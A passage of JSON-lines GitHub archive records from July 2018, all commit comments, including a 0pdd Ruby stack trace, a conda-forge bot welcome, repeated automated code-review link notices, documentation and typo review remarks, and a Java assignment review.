this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-09T12:16:59Z"}
{"id":"7937250403","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/xorg-libxrandr-feedstock"},"payload":{"comment":{"id":29640796,"position":null,"line":null,"path":null,"commit_id":"c4ac71317c33dc43c7fb7f169caa0629e4761d3e","created_at":"2018-07-09T12:17:20Z","updated_at":"2018-07-09T12:17:20Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xarthisius were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @xarthisius were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T12:17:20Z"}
{"id":"7937254735","type":"CommitCommentEvent","actor":{"login":"WaitingLove"},"repo":{"name":"WaitingLove/HeadFirstModelAndDesign"},"payload":{"comment":{"id":29640806,"position":null,"line":null,"path":null,"commit_id":"2c436415029f3fe4cb484599de7385f10dc8bc23","created_at":"2018-07-09T12:18:14Z","updated_at":"2018-07-09T12:18:14Z","author_association":"OWNER","body":"设计模式的原则：\r\n1、将程序中变化的部分抽取出来；\r\n2、面向接口编程，不要面向实现编程；\r\n3、多用接口少用继承"}},"created_at":"2018-07-09T12:18:14Z"}
{"id":"7937258129","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"particle-iot/lightship"},"payload":{"comment":{"id":29640808,"position":null,"line":null,"path":null,"commit_id":"480ee7faf096043421720b1755ae19bb681e3115","created_at":"2018-07-09T12:18:56Z","updated_at":"2018-07-09T12:18:56Z","author_association":"NONE","body":"Thank you for letting me know!\r\n\r\nFixed https://github.com/gajus/roarr/commit/b4773e97783066da7616de53347e7ea42f57179e and patch released."}},"created_at":"2018-07-09T12:18:56Z"}
{"id":"7937263376","type":"CommitCommentEvent","actor":{"login":"msmalik681"},"repo":{"name":"DCurrent/openbor"},"payload":{"comment":{"id":29640817,"position":null,"line":null,"path":null,"commit_id":"8b67b8040de581c8c2b8b88d50f018ef05c68883","created_at":"2018-07-09T12:20:05Z","updated_at":"2018-07-09T12:20:05Z","author_association":"COLLABORATOR","body":"the logo is now full screen without the border at the bottom but now the distortion at the top of the screen from the start.\r\n\r\n![new bug](https://user-images.githubusercontent.com/31506138/42450042-c8171bae-837a-11e8-86ba-c3a7a486c70d.png)\r\n"}},"created_at":"2018-07-09T12:20:05Z"}
{"id":"7937263617","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640818,"position":null,"line":null,"path":null,"commit_id":"881e36d98f7932f58da140bc4f3883b4e719109c","created_at":"2018-07-09T12:20:08Z","updated_at":"2018-07-09T12:20:08Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=394)"}},"created_at":"2018-07-09T12:20:08Z"}
{"id":"7937263681","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640819,"position":null,"line":null,"path":null,"commit_id":"881e36d98f7932f58da140bc4f3883b4e719109c","created_at":"2018-07-09T12:20:09Z","updated_at":"2018-07-09T12:20:09Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:20:09Z"}
{"id":"7937264199","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640823,"position":null,"line":null,"path":null,"commit_id":"3b219c788f32b95624a78e1001f7e4e974591760","created_at":"2018-07-09T12:20:15Z","updated_at":"2018-07-09T12:20:15Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=394)"}},"created_at":"2018-07-09T12:20:15Z"}
{"id":"7937264283","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640824,"position":null,"line":null,"path":null,"commit_id":"3b219c788f32b95624a78e1001f7e4e974591760","created_at":"2018-07-09T12:20:16Z","updated_at":"2018-07-09T12:20:16Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:20:16Z"}
{"id":"7937264416","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640826,"position":null,"line":null,"path":null,"commit_id":"55c859ced6cc5772e2c7fa2eb3eba511e04df997","created_at":"2018-07-09T12:20:17Z","updated_at":"2018-07-09T12:20:17Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=394)"}},"created_at":"2018-07-09T12:20:17Z"}
{"id":"7937264495","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640827,"position":null,"line":null,"path":null,"commit_id":"55c859ced6cc5772e2c7fa2eb3eba511e04df997","created_at":"2018-07-09T12:20:18Z","updated_at":"2018-07-09T12:20:18Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:20:18Z"}
{"id":"7937264564","type":"CommitCommentEvent","actor":{"login":"WaitingLove"},"repo":{"name":"WaitingLove/HeadFirstModelAndDesign"},"payload":{"comment":{"id":29640828,"position":null,"line":null,"path":null,"commit_id":"b1912fa557ceabc5a64c1ec849a9d622ae424e75","created_at":"2018-07-09T12:20:19Z","updated_at":"2018-07-09T12:20:19Z","author_association":"OWNER","body":"idea没有工作空间概念，可以有一个project，project可以有多个modules，相当于分开的多个模块，每个模块可以独立运行"}},"created_at":"2018-07-09T12:20:19Z"}
{"id":"7937264662","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640829,"position":null,"line":null,"path":null,"commit_id":"09b59a61d2068c02d3d60a02d20af7866a5d469d","created_at":"2018-07-09T12:20:20Z","updated_at":"2018-07-09T12:20:20Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=394)"}},"created_at":"2018-07-09T12:20:20Z"}
{"id":"7937264809","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640830,"position":null,"line":null,"path":null,"commit_id":"09b59a61d2068c02d3d60a02d20af7866a5d469d","created_at":"2018-07-09T12:20:22Z","updated_at":"2018-07-09T12:20:22Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:20:22Z"}
{"id":"7937264912","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640831,"position":null,"line":null,"path":null,"commit_id":"0624c71de27158b1be6c456497cf681ab1dfe231","created_at":"2018-07-09T12:20:23Z","updated_at":"2018-07-09T12:20:23Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=394)"}},"created_at":"2018-07-09T12:20:23Z"}
{"id":"7937264988","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640832,"position":null,"line":null,"path":null,"commit_id":"0624c71de27158b1be6c456497cf681ab1dfe231","created_at":"2018-07-09T12:20:24Z","updated_at":"2018-07-09T12:20:24Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:20:24Z"}
{"id":"7937270354","type":"CommitCommentEvent","actor":{"login":"bubifengyun"},"repo":{"name":"yihui/tinytex"},"payload":{"comment":{"id":29640842,"position":null,"line":null,"path":null,"commit_id":"9aab573bd52e507dca5f8450ba1e2b78e8f7b5e4","created_at":"2018-07-09T12:21:29Z","updated_at":"2018-07-09T12:21:29Z","author_association":"NONE","body":"`idx_engine = getOption('tinytex.makeidx', 'makeidx')` should be `idx_engine = getOption('tinytex.makeindex', 'makeidx')`"}},"created_at":"2018-07-09T12:21:29Z"}
{"id":"7937276159","type":"CommitCommentEvent","actor":{"login":"sdake"},"repo":{"name":"john-a-joyce/istio.github.io"},"payload":{"comment":{"id":29640857,"position":6,"line":48,"path":"content/docs/setup/kubernetes/multicluster-install/index.md","commit_id":"425315b0b7ed18f6a645270ea0205c2880fbe2e5","created_at":"2018-07-09T12:22:39Z","updated_at":"2018-07-09T12:22:39Z","author_association":"NONE","body":"maybe/may be"}},"created_at":"2018-07-09T12:22:39Z"}
{"id":"7937277276","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640859,"position":null,"line":null,"path":null,"commit_id":"08aec7a3229072b15a0fcac90feea14b8aebd49b","created_at":"2018-07-09T12:22:53Z","updated_at":"2018-07-09T12:22:53Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=395)"}},"created_at":"2018-07-09T12:22:53Z"}
{"id":"7937277424","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640860,"position":null,"line":null,"path":null,"commit_id":"e4e105c80f6e9b28c2c21213b41857e0e97fdff1","created_at":"2018-07-09T12:22:54Z","updated_at":"2018-07-09T12:22:54Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=396)"}},"created_at":"2018-07-09T12:22:54Z"}
{"id":"7937277440","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640861,"position":null,"line":null,"path":null,"commit_id":"08aec7a3229072b15a0fcac90feea14b8aebd49b","created_at":"2018-07-09T12:22:55Z","updated_at":"2018-07-09T12:22:55Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:22:55Z"}
{"id":"7937277492","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640862,"position":null,"line":null,"path":null,"commit_id":"e4e105c80f6e9b28c2c21213b41857e0e97fdff1","created_at":"2018-07-09T12:22:55Z","updated_at":"2018-07-09T12:22:55Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:22:55Z"}
{"id":"7937277632","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640864,"position":null,"line":null,"path":null,"commit_id":"f3897886686e506a770159edfbf279910391cac4","created_at":"2018-07-09T12:22:57Z","updated_at":"2018-07-09T12:22:57Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=397)"}},"created_at":"2018-07-09T12:22:57Z"}
{"id":"7937277749","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640865,"position":null,"line":null,"path":null,"commit_id":"f3897886686e506a770159edfbf279910391cac4","created_at":"2018-07-09T12:22:58Z","updated_at":"2018-07-09T12:22:58Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:22:58Z"}
{"id":"7937278158","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640866,"position":null,"line":null,"path":null,"commit_id":"64d815f9a2703729b836563eaccbc801161809c4","created_at":"2018-07-09T12:23:04Z","updated_at":"2018-07-09T12:23:04Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=398)"}},"created_at":"2018-07-09T12:23:04Z"}
{"id":"7937278223","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640867,"position":null,"line":null,"path":null,"commit_id":"64d815f9a2703729b836563eaccbc801161809c4","created_at":"2018-07-09T12:23:05Z","updated_at":"2018-07-09T12:23:05Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:05Z"}
{"id":"7937278715","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640869,"position":null,"line":null,"path":null,"commit_id":"893823c26880497caef415cc655a06c5597cc502","created_at":"2018-07-09T12:23:11Z","updated_at":"2018-07-09T12:23:11Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=399)"}},"created_at":"2018-07-09T12:23:11Z"}
{"id":"7937278776","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640870,"position":null,"line":null,"path":null,"commit_id":"893823c26880497caef415cc655a06c5597cc502","created_at":"2018-07-09T12:23:12Z","updated_at":"2018-07-09T12:23:12Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:12Z"}
{"id":"7937279066","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640873,"position":null,"line":null,"path":null,"commit_id":"af25badbf006cac1150b6f0bb5a2476b8f30576c","created_at":"2018-07-09T12:23:15Z","updated_at":"2018-07-09T12:23:15Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=400)"}},"created_at":"2018-07-09T12:23:15Z"}
{"id":"7937279126","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640874,"position":null,"line":null,"path":null,"commit_id":"af25badbf006cac1150b6f0bb5a2476b8f30576c","created_at":"2018-07-09T12:23:16Z","updated_at":"2018-07-09T12:23:16Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:16Z"}
{"id":"7937279542","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640875,"position":null,"line":null,"path":null,"commit_id":"e8344ccc09a1020167e01c54a1c5cfd0e69aa5ee","created_at":"2018-07-09T12:23:21Z","updated_at":"2018-07-09T12:23:21Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=401)"}},"created_at":"2018-07-09T12:23:21Z"}
{"id":"7937279608","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640877,"position":null,"line":null,"path":null,"commit_id":"e8344ccc09a1020167e01c54a1c5cfd0e69aa5ee","created_at":"2018-07-09T12:23:22Z","updated_at":"2018-07-09T12:23:22Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:22Z"}
{"id":"7937280119","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640878,"position":null,"line":null,"path":null,"commit_id":"d1c46db943d5b480e80fd42c959f8f7e0be82e8d","created_at":"2018-07-09T12:23:27Z","updated_at":"2018-07-09T12:23:27Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=402)"}},"created_at":"2018-07-09T12:23:27Z"}
{"id":"7937280178","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640879,"position":null,"line":null,"path":null,"commit_id":"d1c46db943d5b480e80fd42c959f8f7e0be82e8d","created_at":"2018-07-09T12:23:28Z","updated_at":"2018-07-09T12:23:28Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:28Z"}
{"id":"7937280612","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640880,"position":null,"line":null,"path":null,"commit_id":"30e24f73b6683c9906352a9a359a0bb56c2eafa7","created_at":"2018-07-09T12:23:33Z","updated_at":"2018-07-09T12:23:33Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=403)"}},"created_at":"2018-07-09T12:23:33Z"}
{"id":"7937280677","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640881,"position":null,"line":null,"path":null,"commit_id":"30e24f73b6683c9906352a9a359a0bb56c2eafa7","created_at":"2018-07-09T12:23:34Z","updated_at":"2018-07-09T12:23:34Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:34Z"}
{"id":"7937280999","type":"CommitCommentEvent","actor":{"login":"sdake"},"repo":{"name":"john-a-joyce/istio.github.io"},"payload":{"comment":{"id":29640882,"position":32,"line":284,"path":"content/docs/setup/kubernetes/multicluster-install/index.md","commit_id":"425315b0b7ed18f6a645270ea0205c2880fbe2e5","created_at":"2018-07-09T12:23:38Z","updated_at":"2018-07-09T12:23:38Z","author_association":"NONE","body":"please move this content to a unique file in the multicluster-install directory (such as managing-pod-restart.md)."}},"created_at":"2018-07-09T12:23:38Z"}
{"id":"7937281129","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640883,"position":null,"line":null,"path":null,"commit_id":"b0e299e1118c97745e85461f9d2d3c50ff174a89","created_at":"2018-07-09T12:23:39Z","updated_at":"2018-07-09T12:23:39Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=404)"}},"created_at":"2018-07-09T12:23:39Z"}
{"id":"7937281196","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640885,"position":null,"line":null,"path":null,"commit_id":"b0e299e1118c97745e85461f9d2d3c50ff174a89","created_at":"2018-07-09T12:23:40Z","updated_at":"2018-07-09T12:23:40Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:40Z"}
{"id":"7937281617","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640887,"position":null,"line":null,"path":null,"commit_id":"7a567e5ab695e493b1fe0df5002bfe2f6eaedb85","created_at":"2018-07-09T12:23:46Z","updated_at":"2018-07-09T12:23:46Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=405)"}},"created_at":"2018-07-09T12:23:46Z"}
{"id":"7937281687","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640888,"position":null,"line":null,"path":null,"commit_id":"7a567e5ab695e493b1fe0df5002bfe2f6eaedb85","created_at":"2018-07-09T12:23:46Z","updated_at":"2018-07-09T12:23:46Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:46Z"}
{"id":"7937282160","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640890,"position":null,"line":null,"path":null,"commit_id":"32d1703ef86526cf9ba55e29382356cc623b1c61","created_at":"2018-07-09T12:23:52Z","updated_at":"2018-07-09T12:23:52Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=406)"}},"created_at":"2018-07-09T12:23:52Z"}
{"id":"7937282276","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640892,"position":null,"line":null,"path":null,"commit_id":"32d1703ef86526cf9ba55e29382356cc623b1c61","created_at":"2018-07-09T12:23:53Z","updated_at":"2018-07-09T12:23:53Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:53Z"}
{"id":"7937282769","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640896,"position":null,"line":null,"path":null,"commit_id":"86e1bb678482162369c2a462084223d2b5ef4f9e","created_at":"2018-07-09T12:23:58Z","updated_at":"2018-07-09T12:23:58Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=407)"}},"created_at":"2018-07-09T12:23:58Z"}
{"id":"7937282850","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640898,"position":null,"line":null,"path":null,"commit_id":"86e1bb678482162369c2a462084223d2b5ef4f9e","created_at":"2018-07-09T12:23:59Z","updated_at":"2018-07-09T12:23:59Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T12:23:59Z"}
{"id":"7937282939","type":"CommitCommentEvent","actor":{"login":"sdake"},"repo":{"name":"john-a-joyce/istio.github.io"},"payload":{"comment":{"id":29640899,"position":33,"line":285,"path":"content/docs/setup/kubernetes/multicluster-install/index.md","commit_id":"425315b0b7ed18f6a645270ea0205c2880fbe2e5","created_at":"2018-07-09T12:24:00Z","updated_at":"2018-07-09T12:24:00Z","author_association":"NONE","body":"after the move, some of this text will require some rework."}},"created_at":"2018-07-09T12:24:00Z"}
{"id":"7937283197","type":"CommitCommentEvent","actor":{"login":"GovindKalyanaMOJ"},"repo":{"name":"Pareis2/PareisPractise"},"payload":{"comment":{"id":29640900,"position":5,"line":5,"path":"src/Assignment2/EmployeeCompratorDemo.java","commit_id":"d7b7f1badf7fa268ba215e14e02cfd8fda065077","created_at":"2018-07-09T12:24:03Z","updated_at":"2018-07-09T12:24:03Z","author_association":"COLLABORATOR","body":"Write two methods to implement this. One to sort the employees based on their age such that the first element points to the youngest employee and the other method to sort the employees based on their salary such that the first element points to the employee who earns the maximum. Avoid doing much on the public static void main other than invoking the desired methods."}},"created_at":"2018-07-09T12:24:03Z"}
